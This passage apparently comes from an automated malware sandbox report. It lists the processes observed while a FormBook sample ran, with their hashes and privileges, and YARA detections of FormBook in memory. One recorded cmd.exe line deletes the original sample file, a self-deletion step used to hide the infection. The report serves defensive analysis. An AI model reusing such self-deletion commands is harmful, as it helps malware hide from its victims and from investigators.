                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                  Imagebase:0xfa0000
                                                                                                                  File size:851968 bytes
                                                                                                                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Analysis Process: cscript.exe PID: 1632 Parent PID: 5880

                                                                                                                  General

                                                                                                                  Start time:18:24:37
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Imagebase:0xac0000
                                                                                                                  File size:143360 bytes
                                                                                                                  MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:moderate

                                                                                                                  Analysis Process: cmd.exe PID: 1864 Parent PID: 1632

                                                                                                                  General

                                                                                                                  Start time:18:24:39
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:/c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x8c0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Analysis Process: conhost.exe PID: 1488 Parent PID: 1864

                                                                                                                  General

                                                                                                                  Start time:18:24:40
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >